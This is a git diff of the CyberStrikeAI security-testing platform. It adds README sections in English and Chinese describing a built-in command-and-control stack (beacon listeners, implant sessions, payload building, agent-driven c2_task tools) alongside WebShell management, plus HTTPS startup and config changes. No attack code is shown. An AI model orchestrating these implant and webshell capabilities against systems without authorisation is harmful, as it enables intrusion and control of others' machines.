- **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only. - **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only.
- **Management** Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`. - **Management** Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`.
- **Config** `multi_agent` in `config.yaml`: `enabled`, `default_mode`, `robot_use_multi_agent`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning). - **Config** `multi_agent` in `config.yaml`: `enabled`, `robot_default_agent_mode`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning).
- **Details** **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats). - **Details** **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats).
### Skills System (Agent Skills + Eino) ### Skills System (Agent Skills + Eino)
@@ -320,6 +326,12 @@ Requirements / tips:
- **Connectivity test** Use **Test connectivity** to verify that the shell URL, password, and command parameter are correct before running commands (sends a lightweight `echo 1` check). - **Connectivity test** Use **Test connectivity** to verify that the shell URL, password, and command parameter are correct before running commands (sends a lightweight `echo 1` check).
- **Persistence** All WebShell connections and AI conversations are stored in SQLite (same database as conversations), so they persist across restarts. - **Persistence** All WebShell connections and AI conversations are stored in SQLite (same database as conversations), so they persist across restarts.
### Built-in C2 (Command & Control)
- **What it is** A first-party, **AI-native** C2 stack: listeners accept implants (beacons), the server stores **sessions** and **tasks** in SQLite, pushes updates over an **event bus** (including **SSE**), and exposes everything through authenticated **REST** plus MCP.
- **Listeners & transports** `tcp_reverse`, `http_beacon`, `https_beacon`, and `websocket`; per-listener crypto keys; running listeners can be **restored after restart** when marked running in the database.
- **Agent integration** MCP exposes a small **C2 tool family** (listeners, sessions, **`c2_task`**, task management, payloads, events, profiles, files) so the same agent loop can orchestrate C2 alongside other tools; dangerous task types can go through the existing **HITL** bridge when your session policy requires it.
- **Safety** Use **only** in lab or **fully authorized** engagements; combine network isolation, strong auth, and HITL/allowlists as your policy demands.
### MCP Everywhere ### MCP Everywhere
- **Web mode** ships with HTTP MCP server automatically consumed by the UI. - **Web mode** ships with HTTP MCP server automatically consumed by the UI.
- **MCP stdio mode** `go run cmd/mcp-stdio/main.go` exposes the agent to Cursor/CLI. - **MCP stdio mode** `go run cmd/mcp-stdio/main.go` exposes the agent to Cursor/CLI.
@@ -476,6 +488,7 @@ A test SSE MCP server is available at `cmd/test-sse-mcp-server/` for validation
- **Vulnerability APIs** manage vulnerabilities via `/api/vulnerabilities` endpoints: `GET /api/vulnerabilities` (list with filters), `POST /api/vulnerabilities` (create), `GET /api/vulnerabilities/:id` (get), `PUT /api/vulnerabilities/:id` (update), `DELETE /api/vulnerabilities/:id` (delete), `GET /api/vulnerabilities/stats` (statistics). - **Vulnerability APIs** manage vulnerabilities via `/api/vulnerabilities` endpoints: `GET /api/vulnerabilities` (list with filters), `POST /api/vulnerabilities` (create), `GET /api/vulnerabilities/:id` (get), `PUT /api/vulnerabilities/:id` (update), `DELETE /api/vulnerabilities/:id` (delete), `GET /api/vulnerabilities/stats` (statistics).
- **Batch Task APIs** manage batch task queues via `/api/batch-tasks` endpoints: `POST /api/batch-tasks` (create queue), `GET /api/batch-tasks` (list queues), `GET /api/batch-tasks/:queueId` (get queue), `POST /api/batch-tasks/:queueId/start` (start execution), `POST /api/batch-tasks/:queueId/cancel` (cancel), `DELETE /api/batch-tasks/:queueId` (delete), `POST /api/batch-tasks/:queueId/tasks` (add task), `PUT /api/batch-tasks/:queueId/tasks/:taskId` (update task), `DELETE /api/batch-tasks/:queueId/tasks/:taskId` (delete task). Tasks execute sequentially, each creating a separate conversation with full status tracking. - **Batch Task APIs** manage batch task queues via `/api/batch-tasks` endpoints: `POST /api/batch-tasks` (create queue), `GET /api/batch-tasks` (list queues), `GET /api/batch-tasks/:queueId` (get queue), `POST /api/batch-tasks/:queueId/start` (start execution), `POST /api/batch-tasks/:queueId/cancel` (cancel), `DELETE /api/batch-tasks/:queueId` (delete), `POST /api/batch-tasks/:queueId/tasks` (add task), `PUT /api/batch-tasks/:queueId/tasks/:taskId` (update task), `DELETE /api/batch-tasks/:queueId/tasks/:taskId` (delete task). Tasks execute sequentially, each creating a separate conversation with full status tracking.
- **WebShell APIs** manage WebShell connections and execute commands via `/api/webshell/connections` (GET list, POST create, PUT update, DELETE delete) and `/api/webshell/exec` (command execution), `/api/webshell/fileop` (list/read/write/delete files). - **WebShell APIs** manage WebShell connections and execute commands via `/api/webshell/connections` (GET list, POST create, PUT update, DELETE delete) and `/api/webshell/exec` (command execution), `/api/webshell/fileop` (list/read/write/delete files).
- **C2 APIs** manage listeners, sessions, tasks, payloads, files, and events under `/api/c2/*` (e.g. listeners CRUD/start/stop, session sleep, task create/cancel/wait, payload build/download, event stream).
- **Task control** pause/resume/stop long scans, re-run steps with new params, or stream transcripts. - **Task control** pause/resume/stop long scans, re-run steps with new params, or stream transcripts.
- **Audit & security** rotate passwords via `/api/auth/change-password`, enforce short-lived sessions, and restrict MCP ports at the network layer when exposing the service. - **Audit & security** rotate passwords via `/api/auth/change-password`, enforce short-lived sessions, and restrict MCP ports at the network layer when exposing the service.
@@ -523,7 +536,7 @@ agents_dir: "agents" # Multi-agent Markdown definitions (orchestrator + sub-age
multi_agent: multi_agent:
enabled: false enabled: false
default_mode: "single" # single | multi (UI default when multi-agent is enabled) default_mode: "single" # single | multi (UI default when multi-agent is enabled)
robot_use_multi_agent: false robot_default_agent_mode: react
batch_use_multi_agent: false batch_use_multi_agent: false
orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional # orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional
@@ -581,7 +594,7 @@ enabled: true
``` ```
CyberStrikeAI/ CyberStrikeAI/
├── cmd/ # Server, MCP stdio entrypoints, tooling ├── cmd/ # Server, MCP stdio entrypoints, tooling
├── internal/ # Agent, MCP core, handlers, security executor ├── internal/ # Agent, MCP core, handlers, C2 (`internal/c2`), security executor
├── web/ # Static SPA + templates ├── web/ # Static SPA + templates
├── tools/ # YAML tool recipes (100+ examples provided) ├── tools/ # YAML tool recipes (100+ examples provided)
├── roles/ # Role configurations (12+ predefined security testing roles) ├── roles/ # Role configurations (12+ predefined security testing roles)
+23 -10
View File
@@ -1,5 +1,5 @@
<div align="center"> <div align="center">
<img src="web/static/logo.png" alt="CyberStrikeAI Logo" width="200"> <img src="images/logo.png" alt="CyberStrikeAI Logo" width="200">
</div> </div>
# CyberStrikeAI # CyberStrikeAI
@@ -26,7 +26,7 @@
</details> </details>
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能,以及完整的测试生命周期管理能力。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。 CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能完整的测试生命周期管理能力,以及面向 **授权场景****内置轻量 C2Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
## 界面与集成预览 ## 界面与集成预览
@@ -120,6 +120,7 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
- 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md) - 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md)
- 🧑‍⚖️ **人机协同(HITL**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml``hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用 - 🧑‍⚖️ **人机协同(HITL**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml``hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用
- 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。 - 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。
- 📡 **内置 C2**:面向 AI 协同的轻量 **C2**——**多种监听器**TCP 反向、HTTP/HTTPS Beacon、WebSocket)、**加密** Beacon 信道、**会话与任务**队列及持久化、**Payload** 辅助(一键命令 / 构建 / 下载)、**SSE** 实时事件、REST`/api/c2/*`)及智能体侧 **一组 C2 MCP 工具**(如 `c2_listener``c2_session`、**`c2_task`**、`c2_task_manage``c2_payload``c2_event``c2_profile``c2_file`);敏感操作可对接 **人机协同(HITL**,并支持 OPSEC 类规则(如命令拒绝正则)。**仅限授权测试。**
## 插件(Plugins ## 插件(Plugins
@@ -172,9 +173,11 @@ chmod +x run.sh && ./run.sh
- ✅ 编译构建项目 - ✅ 编译构建项目
- ✅ 启动服务器 - ✅ 启动服务器
**网络默认:** `run.sh` 会以 **`--https`** 并传入项目根 **`config.yaml`** 启动(本机自签证书,多路流式场景更稳)。只要明文 HTTP 用 **`./run.sh --http`**。生产环境在 **`config.yaml`** 的 **`server.tls_cert_path` / `server.tls_key_path`** 配正式证书(见文件内注释)。手动启动可加 **`--https`** 或环境变量 **`CYBERSTRIKE_HTTPS=1`**`-config` 写错时程序会在终端提示正确写法。
**首次配置:** **首次配置:**
1. **配置 AI 模型 API**(首次使用前必填) 1. **配置 AI 模型 API**(首次使用前必填)
- 启动后访问 http://localhost:8080 - 启动后在浏览器打开 **`https://127.0.0.1:8080/`**(或 **`https://localhost:8080/`**;端口以 `config.yaml`**`server.port`** 为准,默认 8080),并按提示信任自签证书。若使用 **`./run.sh --http`**,则改用 **`http://`** 访问。
- 进入 `设置` → 填写 API 配置信息: - 进入 `设置` → 填写 API 配置信息:
```yaml ```yaml
openai: openai:
@@ -195,20 +198,22 @@ chmod +x run.sh && ./run.sh
**其他启动方式:** **其他启动方式:**
```bash ```bash
# 直接运行(需手动配置环境) # 直接运行(需自行配环境);与 run.sh 默认一致可加 --https
go run cmd/server/main.go go run cmd/server/main.go --https
# 手动编译 # 手动编译
go build -o cyberstrike-ai cmd/server/main.go go build -o cyberstrike-ai cmd/server/main.go
./cyberstrike-ai ./cyberstrike-ai --https
``` ```
若日志出现 `client sent an HTTP request to an HTTPS server`,说明仍有客户端用 **`http://`** 访问只提供 HTTPS 的端口,请改为 **`https://`**。
**说明:** Python 虚拟环境(`venv/`)由 `run.sh` 自动创建和管理。需要 Python 的工具(如 `api-fuzzer`、`http-framework-test` 等)会自动使用该环境。 **说明:** Python 虚拟环境(`venv/`)由 `run.sh` 自动创建和管理。需要 Python 的工具(如 `api-fuzzer`、`http-framework-test` 等)会自动使用该环境。
### CyberStrikeAI 版本更新(无兼容性问题) ### CyberStrikeAI 版本更新(无兼容性问题)
1. (首次使用)启用脚本:`chmod +x upgrade.sh` 1. (首次使用)启用脚本:`chmod +x upgrade.sh`
2. 一键升级:`./upgrade.sh`(可选参数:`--tag vX.Y.Z`、`--no-venv`、`--preserve-custom`、`--yes` 2. 一键升级:`./upgrade.sh`(可选参数:`--tag vX.Y.Z`、`--no-venv`、`--yes`)。本地的 `tools/`、`roles/`、`skills/` 会始终保留不被覆盖。
3. 脚本会备份你的 `config.yaml` 和 `data/`,从 GitHub Release 升级代码,更新 `config.yaml` 的 `version` 字段后重启服务。 3. 脚本会备份你的 `config.yaml` 和 `data/`,从 GitHub Release 升级代码,更新 `config.yaml` 的 `version` 字段后重启服务。
推荐的一键指令: 推荐的一键指令:
@@ -235,6 +240,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **漏洞管理**:在测试过程中创建、更新和跟踪发现的漏洞。支持按严重程度(严重/高/中/低/信息)、状态(待确认/已确认/已修复/误报)和对话进行过滤,查看统计信息并导出发现。 - **漏洞管理**:在测试过程中创建、更新和跟踪发现的漏洞。支持按严重程度(严重/高/中/低/信息)、状态(待确认/已确认/已修复/误报)和对话进行过滤,查看统计信息并导出发现。
- **批量任务管理**:创建任务队列,批量添加多个任务,执行前可编辑或删除任务,然后依次顺序执行。每个任务会作为独立对话执行,支持完整的状态跟踪(待执行/执行中/已完成/失败/已取消)和执行历史。 - **批量任务管理**:创建任务队列,批量添加多个任务,执行前可编辑或删除任务,然后依次顺序执行。每个任务会作为独立对话执行,支持完整的状态跟踪(待执行/执行中/已完成/失败/已取消)和执行历史。
- **WebShell 管理**:添加并管理 WebShell 连接(PHP/ASP/ASPX/JSP 或自定义类型)。使用虚拟终端执行命令(带命令历史与快捷命令),使用文件管理浏览、读取、编辑、上传与删除目标文件,并支持按路径导航和名称过滤。连接信息持久化存储于 SQLite,支持 GET/POST 及可配置命令参数(兼容冰蝎/蚁剑等)。 - **WebShell 管理**:添加并管理 WebShell 连接(PHP/ASP/ASPX/JSP 或自定义类型)。使用虚拟终端执行命令(带命令历史与快捷命令),使用文件管理浏览、读取、编辑、上传与删除目标文件,并支持按路径导航和名称过滤。连接信息持久化存储于 SQLite,支持 GET/POST 及可配置命令参数(兼容冰蝎/蚁剑等)。
- **内置 C2**:在 Web 界面或 `/api/c2/*` 创建/启动 **监听器**、生成 **Payload**、查看 **会话**、下发 **任务** 并订阅 **事件(SSE)**。智能体与外部客户端通过 **C2 MCP 工具族**(含 **`c2_task`** 等)编排;开启人机协同时,高风险任务可走审批。**仅用于已获明确授权的目标。**
- **可视化配置**:在界面中切换模型、启停工具、设置迭代次数等。 - **可视化配置**:在界面中切换模型、启停工具、设置迭代次数等。
- **人机协同(HITL)**:侧栏设置协同模式与免审批工具(逗号或换行);全局白名单见 `config.yaml` 的 `hitl.tool_whitelist`。点「**应用**」可写浏览器/服务端并合并新增工具进配置(**无需重启**)。**新对话**保留侧栏选择;导航 **人机协同** 处理待审批。从侧栏删掉工具不会自动从配置文件移除全局项,需手改 `config.yaml`。 - **人机协同(HITL)**:侧栏设置协同模式与免审批工具(逗号或换行);全局白名单见 `config.yaml` 的 `hitl.tool_whitelist`。点「**应用**」可写浏览器/服务端并合并新增工具进配置(**无需重启**)。**新对话**保留侧栏选择;导航 **人机协同** 处理待审批。从侧栏删掉工具不会自动从配置文件移除全局项,需手改 `config.yaml`。
@@ -277,7 +283,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **Supervisor 主代理**:固定 **`orchestrator-supervisor.md`**(另可配 `orchestrator_instruction_supervisor`);至少需一名子代理。 - **Supervisor 主代理**:固定 **`orchestrator-supervisor.md`**(另可配 `orchestrator_instruction_supervisor`);至少需一名子代理。
- **子代理****deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。 - **子代理****deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。
- **界面管理****Agents → Agent 管理**API `/api/multi-agent/markdown-agents`。 - **界面管理****Agents → Agent 管理**API `/api/multi-agent/markdown-agents`。
- **配置项**`multi_agent``enabled`、`default_mode`、`robot_use_multi_agent`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。 - **配置项**`multi_agent``enabled`、`robot_default_agent_mode`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。
- **更多细节**[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。 - **更多细节**[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。
### Skills 技能系统(Agent Skills + Eino ### Skills 技能系统(Agent Skills + Eino
@@ -317,6 +323,12 @@ go build -o cyberstrike-ai cmd/server/main.go
- **连通性测试**:使用 **测试连通性** 可在执行命令前通过一次 `echo 1` 调用校验 Shell 地址、密码与命令参数是否正确。 - **连通性测试**:使用 **测试连通性** 可在执行命令前通过一次 `echo 1` 调用校验 Shell 地址、密码与命令参数是否正确。
- **持久化**:所有 WebShell 连接与相关 AI 会话均保存在 SQLite(与对话共用数据库),服务重启后仍可继续使用。 - **持久化**:所有 WebShell 连接与相关 AI 会话均保存在 SQLite(与对话共用数据库),服务重启后仍可继续使用。
### 内置 C2Command & Control
- **定位**:平台内置的 **AI 原生** C2 能力栈——监听器接入植入体(Beacon),服务端以 SQLite 持久化 **会话** 与 **任务**,通过 **事件总线** 推送变更(含 **SSE**),并由鉴权后的 **REST** 与 MCP 统一对外。
- **监听器与传输**:支持 `tcp_reverse`、`http_beacon`、`https_beacon`、`websocket`;按监听器独立密钥;数据库中标记为运行中的监听器可在 **服务重启后尝试恢复**。
- **与智能体联动**:通过 **`c2_task` 等 C2 MCP 工具** 与现有对话/多代理工具链协同;在会话策略需要时,危险任务类型可走既有 **人机协同(HITL)** 审批流。
- **安全提示**:**仅**在实验环境或 **已获完整书面授权** 的对抗演练中使用;结合网络隔离、强鉴权及 HITL/白名单等策略管控风险。
### MCP 全场景 ### MCP 全场景
- **Web 模式**:自带 HTTP MCP 服务供前端调用。 - **Web 模式**:自带 HTTP MCP 服务供前端调用。
- **MCP stdio 模式**`go run cmd/mcp-stdio/main.go` 可接入 Cursor/命令行。 - **MCP stdio 模式**`go run cmd/mcp-stdio/main.go` 可接入 Cursor/命令行。
@@ -474,6 +486,7 @@ CyberStrikeAI 支持通过三种传输模式连接外部 MCP 服务器:
- **漏洞管理 API**:通过 `/api/vulnerabilities` 端点管理漏洞:`GET /api/vulnerabilities`(列表,支持过滤)、`POST /api/vulnerabilities`(创建)、`GET /api/vulnerabilities/:id`(获取)、`PUT /api/vulnerabilities/:id`(更新)、`DELETE /api/vulnerabilities/:id`(删除)、`GET /api/vulnerabilities/stats`(统计)。 - **漏洞管理 API**:通过 `/api/vulnerabilities` 端点管理漏洞:`GET /api/vulnerabilities`(列表,支持过滤)、`POST /api/vulnerabilities`(创建)、`GET /api/vulnerabilities/:id`(获取)、`PUT /api/vulnerabilities/:id`(更新)、`DELETE /api/vulnerabilities/:id`(删除)、`GET /api/vulnerabilities/stats`(统计)。
- **批量任务 API**:通过 `/api/batch-tasks` 端点管理批量任务队列:`POST /api/batch-tasks`(创建队列)、`GET /api/batch-tasks`(列表)、`GET /api/batch-tasks/:queueId`(获取队列)、`POST /api/batch-tasks/:queueId/start`(开始执行)、`POST /api/batch-tasks/:queueId/cancel`(取消)、`DELETE /api/batch-tasks/:queueId`(删除队列)、`POST /api/batch-tasks/:queueId/tasks`(添加任务)、`PUT /api/batch-tasks/:queueId/tasks/:taskId`(更新任务)、`DELETE /api/batch-tasks/:queueId/tasks/:taskId`(删除任务)。任务依次顺序执行,每个任务创建独立对话,支持完整状态跟踪。 - **批量任务 API**:通过 `/api/batch-tasks` 端点管理批量任务队列:`POST /api/batch-tasks`(创建队列)、`GET /api/batch-tasks`(列表)、`GET /api/batch-tasks/:queueId`(获取队列)、`POST /api/batch-tasks/:queueId/start`(开始执行)、`POST /api/batch-tasks/:queueId/cancel`(取消)、`DELETE /api/batch-tasks/:queueId`(删除队列)、`POST /api/batch-tasks/:queueId/tasks`(添加任务)、`PUT /api/batch-tasks/:queueId/tasks/:taskId`(更新任务)、`DELETE /api/batch-tasks/:queueId/tasks/:taskId`(删除任务)。任务依次顺序执行,每个任务创建独立对话,支持完整状态跟踪。
- **WebShell API**:通过 `/api/webshell/connections`GET 列表、POST 创建、PUT 更新、DELETE 删除)及 `/api/webshell/exec`(执行命令)、`/api/webshell/fileop`(列出/读取/写入/删除文件)管理 WebShell 连接与执行操作。 - **WebShell API**:通过 `/api/webshell/connections`GET 列表、POST 创建、PUT 更新、DELETE 删除)及 `/api/webshell/exec`(执行命令)、`/api/webshell/fileop`(列出/读取/写入/删除文件)管理 WebShell 连接与执行操作。
- **C2 API**:在 `/api/c2/*` 管理监听器、会话、任务、Payload、文件与事件(如监听器增删改查/启停、会话休眠、任务创建/取消/等待、Payload 构建/下载、事件流等)。
- **任务控制**:支持暂停/终止长任务、修改参数后重跑、流式获取日志。 - **任务控制**:支持暂停/终止长任务、修改参数后重跑、流式获取日志。
- **安全管理**`/api/auth/change-password` 可即时轮换口令;建议在暴露 MCP 端口时配合网络层 ACL。 - **安全管理**`/api/auth/change-password` 可即时轮换口令;建议在暴露 MCP 端口时配合网络层 ACL。
@@ -521,7 +534,7 @@ agents_dir: "agents" # 多代理 Markdown(主代理 orchestrator.md + 子代
multi_agent: multi_agent:
enabled: false enabled: false
default_mode: "single" # single | multi(开启多代理时的界面默认模式) default_mode: "single" # single | multi(开启多代理时的界面默认模式)
robot_use_multi_agent: false robot_default_agent_mode: react
batch_use_multi_agent: false batch_use_multi_agent: false
orchestrator_instruction: "" # Deeporchestrator.md 正文为空时使用 orchestrator_instruction: "" # Deeporchestrator.md 正文为空时使用
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选 # orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选
@@ -579,7 +592,7 @@ enabled: true
``` ```
CyberStrikeAI/ CyberStrikeAI/
├── cmd/ # Web 服务、MCP stdio 入口及辅助工具 ├── cmd/ # Web 服务、MCP stdio 入口及辅助工具
├── internal/ # Agent、MCP 核心、路由与执行器 ├── internal/ # Agent、MCP 核心、路由、C2`internal/c2`与执行器
├── web/ # 前端静态资源与模板 ├── web/ # 前端静态资源与模板
├── tools/ # YAML 工具目录(含 100+ 示例) ├── tools/ # YAML 工具目录(含 100+ 示例)
├── roles/ # 角色配置文件目录(含 12+ 预设安全测试角色) ├── roles/ # 角色配置文件目录(含 12+ 预设安全测试角色)
+18
View File
@@ -5,6 +5,7 @@ import (
"cyberstrike-ai/internal/logger" "cyberstrike-ai/internal/logger"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
"cyberstrike-ai/internal/storage"
"flag" "flag"
"fmt" "fmt"
"os" "os"
@@ -32,6 +33,23 @@ func main() {
// 创建安全工具执行器 // 创建安全工具执行器
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger) executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
// 初始化结果存储(与 internal/app/app.go 同样的逻辑)。
// stdio 模式下原本不初始化,导致 'exec' 等查询型工具报"结果存储未初始化"。
resultStorageDir := "tmp"
if cfg.Agent.ResultStorageDir != "" {
resultStorageDir = cfg.Agent.ResultStorageDir
}
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
fmt.Fprintf(os.Stderr, "创建结果存储目录失败: %v\n", err)
os.Exit(1)
}
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
if err != nil {
fmt.Fprintf(os.Stderr, "初始化结果存储失败: %v\n", err)
os.Exit(1)
}
executor.SetResultStorage(resultStorage)
// 注册工具 // 注册工具
executor.RegisterTools(mcpServer) executor.RegisterTools(mcpServer)
+43 -3
View File
@@ -9,22 +9,62 @@ import (
"fmt" "fmt"
"os" "os"
"os/signal" "os/signal"
"strings"
"syscall" "syscall"
) )
func main() { func main() {
var configPath = flag.String("config", "config.yaml", "配置文件路径") var configPath = flag.String("config", "config.yaml", "配置文件路径")
var httpsBootstrap = flag.Bool("https", false, "启用主站 HTTPS:未配置 tls_cert_path/tls_key_path 时使用内存自签证书(本地测试);与 run.sh 默认行为一致")
flag.Parse() flag.Parse()
// 环境变量兼容(便于 systemd/docker 等不传参场景)
if !*httpsBootstrap {
v := strings.TrimSpace(os.Getenv("CYBERSTRIKE_HTTPS"))
if v == "1" || strings.EqualFold(v, "true") || strings.EqualFold(v, "yes") {
*httpsBootstrap = true
}
}
// 加载配置 // 加载配置
cfg, err := config.Load(*configPath) cp := strings.TrimSpace(*configPath)
if cp == "" {
cp = "config.yaml"
}
if strings.HasPrefix(cp, "-") {
fmt.Fprintf(os.Stderr, "无效的 -config 路径 %q。\n若同时需要 HTTPS,请写成: ./cyberstrike-ai --https -config config.yaml-config 后必须是 yaml 文件路径)。\n", cp)
os.Exit(2)
}
cfg, err := config.Load(cp)
if err != nil { if err != nil {
fmt.Printf("加载配置失败: %v\n", err) fmt.Printf("加载配置失败: %v\n", err)
return return
} }
if *httpsBootstrap {
config.ApplyDevHTTPSBootstrap(cfg)
}
port := cfg.Server.Port
if port <= 0 {
port = 8080
}
scheme := "http"
if config.MainWebUIUsesHTTPS(&cfg.Server) {
scheme = "https"
}
fmt.Println()
fmt.Printf("→ Web 界面: %s://127.0.0.1:%d/\n", scheme, port)
if scheme == "https" && cfg.Server.TLSAutoSelfSign {
fmt.Println(" (内存自签证书:浏览器首次需确认「继续访问」)")
}
if scheme == "https" && config.ServerHTTPRedirectEnabled(&cfg.Server) {
fmt.Printf(" http://127.0.0.1:%d/ 将自动跳转到 HTTPS\n", port)
}
fmt.Println()
// MCP 启用且 auth_header_value 为空时,自动生成随机密钥并写回配置 // MCP 启用且 auth_header_value 为空时,自动生成随机密钥并写回配置
if err := config.EnsureMCPAuth(*configPath, cfg); err != nil { if err := config.EnsureMCPAuth(cp, cfg); err != nil {
fmt.Printf("MCP 鉴权配置失败: %v\n", err) fmt.Printf("MCP 鉴权配置失败: %v\n", err)
return return
} }
@@ -44,7 +84,7 @@ func main() {
signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
// 创建应用 // 创建应用
application, err := app.New(cfg, log) application, err := app.New(cfg, log, cp)
if err != nil { if err != nil {
log.Fatal("应用初始化失败", "error", err) log.Fatal("应用初始化失败", "error", err)
} }
+74 -10
View File
@@ -10,11 +10,22 @@
# ============================================ # ============================================
# 前端显示的版本号(可选,不填则显示默认版本) # 前端显示的版本号(可选,不填则显示默认版本)
version: "v1.5.7" version: "v1.6.20"
# 服务器配置 # 服务器配置
server: server:
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口 host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
port: 8080 # HTTP 服务端口,可通过浏览器访问 http://localhost:8080 port: 8080 # 服务端口;未启用 TLS 时为 http://localhost:8080
# --- 可选:HTTPS + HTTP/2(缓解浏览器对同源 HTTP/1.1 的并发连接数限制,多路 Deep 流式更稳)---
# 启用 TLS 的条件(满足其一即可):tls_enabled: true,或 tls_auto_self_sign: true,或同时配置了 tls_cert_path + tls_key_path。
# 启用后请用 https://127.0.0.1:<本端口>/ 访问;若仍用 http:// 访问同端口,将自动 308 跳转到 HTTPS(可用 tls_http_redirect: false 关闭)。
tls_enabled: true
# 启用 HTTPS 时,明文 HTTP 是否自动跳转到 HTTPS(默认 true;同端口嗅探 TLS/HTTP 后分流)
# tls_http_redirect: true
# 方式 A(推荐生产):PEM 证书与私钥路径
# tls_cert_path: /path/to/fullchain.pem
# tls_key_path: /path/to/privkey.pem
# 方式 B(仅本地/测试):无证书文件时内存自签(浏览器会提示不受信任;SAN 含 localhost / 127.0.0.1
tls_auto_self_sign: true
# 认证配置 # 认证配置
auth: auth:
password: # Web 登录密码,请修改为强密码 password: # Web 登录密码,请修改为强密码
@@ -23,6 +34,12 @@ auth:
log: log:
level: info # 日志级别: debug(调试), info(信息), warn(警告), error(错误) level: info # 日志级别: debug(调试), info(信息), warn(警告), error(错误)
output: stdout # 日志输出位置: stdout(标准输出), stderr(标准错误), 或文件路径 output: stdout # 日志输出位置: stdout(标准输出), stderr(标准错误), 或文件路径
# 平台操作审计(系统设置 -> 日志审计;不记录对话正文与每次工具调用)
audit:
enabled: true
retention_days: 15 # 0 表示不自动清理
max_detail_bytes: 8192
auth_failure_cooldown_seconds: 60 # 同一 IP 登录/改密失败审计最短间隔(秒);未配置时默认 60;-1 关闭节流
# ============================================ # ============================================
# 对话相关配置 # 对话相关配置
# ============================================ # ============================================
@@ -41,6 +58,13 @@ openai:
api_key: sk-xxxxxxx # API 密钥(必填) api_key: sk-xxxxxxx # API 密钥(必填)
model: qwen3-max # 模型名称(必填) model: qwen3-max # 模型名称(必填)
